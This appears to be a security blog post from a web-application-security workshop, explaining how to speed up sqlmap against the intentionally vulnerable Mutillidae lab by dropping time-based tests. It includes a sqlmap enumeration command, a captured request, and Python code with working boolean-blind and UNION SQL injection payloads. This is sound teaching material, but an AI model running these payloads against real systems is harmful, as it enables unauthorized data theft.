#30 - SQLmap & Mutillidae
Two weeks ago I ran a Web Application Security workshop in Thimphu, Bhutan (in collaboration with BtCIRT).
For the SQL injection lab, I found that sqlmap took quite a long time to enumerate the Mutillidae database. It turns out the default technique set (the --technique option) needs a small tweak. The default is BEUST, i.e. all of:

- B: Boolean-based blind SQL injection
- E: Error-based SQL injection
- U: UNION query SQL injection
- S: Stacked queries SQL injection
- T: Time-based blind SQL injection

The expensive one is T. A time-based blind test can only tell true from false by making the database sleep long enough for the delay to be measurable over the network, so every request in that phase costs seconds rather than milliseconds, and sqlmap has to send many of them just to confirm the technique and then again for every character it extracts. Against a page like Mutillidae's user-info, which echoes both query results and database errors, B, E and U already give a fast extraction channel, so leaving T out of the set saves most of the waiting.
```shell
sqlmap -r request.txt -p username --dbms=mysql -o --threads=10 --technique=BEUS --dbs
```
Note: request.txt contains the raw HTTP request (URL and the injectable parameter) and can be captured with ZAP Proxy. sqlmap replays the request exactly as captured, including the PHPSESSID cookie, so take it from a live session; -p username restricts testing to that one parameter instead of every parameter in the request, which is another noticeable time saving.
```http
GET http://localhost/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/mutillidae/index.php?page=user-info.php
Connection: keep-alive
Cookie: showhints=1; PHPSESSID=r8mv7ultidjmnndr25al8mqosi
Upgrade-Insecure-Requests: 1
```
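To make the cost difference between the techniques concrete, here is an added example that is not part of the original post and not sqlmap's own code: a small Python stand-in for Mutillidae's user-info.php built on SQLite, with a constructed accounts table (the column names and rows are assumptions for the example, not the real Mutillidae schema), plus a hand-rolled boolean-based blind (B) and UNION-based (U) extraction against it. It counts simulated requests so you can see why the inference techniques are the expensive ones, and therefore why T, which adds a deliberate delay to every one of those requests, is the technique to drop.

```python
import sqlite3
import string

# Character set the blind extraction iterates over (enough for the sample data).
CHARSET = string.ascii_lowercase + string.digits


def build_db():
    """Constructed stand-in for Mutillidae's accounts table (assumed schema/rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("admin", "adminpass", "g0t r00t?"),
         ("adrian", "somepassword", "Zombie Films Rock!"),
         ("test", "test", "Hello")],
    )
    return conn


class Target:
    """Mock of user-info.php: username/password are concatenated straight into the
    query, which is the injection point sqlmap exercises with -p username."""

    def __init__(self):
        self.conn = build_db()
        self.requests = 0  # one increment per simulated HTTP request

    def user_info(self, username, password):
        self.requests += 1
        sql = ("SELECT username, password, signature FROM accounts "
               f"WHERE username='{username}' AND password='{password}'")
        try:
            return self.conn.execute(sql).fetchall()
        except sqlite3.Error:
            return None  # the real page would render an error here (technique E)


def boolean_blind(target, subquery, charset=CHARSET):
    """Technique B: one yes/no question per request. The injected AND lets the
    known 'test' row through only when the guessed character is right; the
    trailing comment discards the rest of the original WHERE clause."""
    result = ""
    while True:
        for ch in charset:
            payload = f"test' AND substr(({subquery}),{len(result) + 1},1)='{ch}'-- "
            if target.user_info(payload, "ignored"):
                result += ch
                break
        else:
            return result  # no character matched this position: end of string


def union_dump(target):
    """Technique U: a UNION SELECT with the same column count (3 in this mock)
    returns every row in a single request. sqlmap works the column count out
    itself with ORDER BY / NULL probing before it gets here."""
    payload = "x' UNION SELECT username, password, signature FROM accounts-- "
    return target.user_info(payload, "ignored")


if __name__ == "__main__":
    t = Target()
    pw = boolean_blind(t, "SELECT password FROM accounts WHERE username='admin'")
    print(f"B: admin password {pw!r} after {t.requests} requests")
    t = Target()
    rows = union_dump(t)
    print(f"U: {len(rows)} rows after {t.requests} request(s): {rows}")
```

Running it, the boolean-based loop needs well over a hundred requests to recover one nine-character password, while the UNION query returns the whole table in one. SQLite has no SLEEP(), so T is not simulated here, but on MySQL the same loop becomes AND IF(substr(...)='a', SLEEP(5), 0) with each request costing the full delay, which is exactly the waiting the BEUS setting avoids. Note also the comment syntax: on MySQL the trailing comment must be `-- ` with a space (or `#`), which is what sqlmap handles for you.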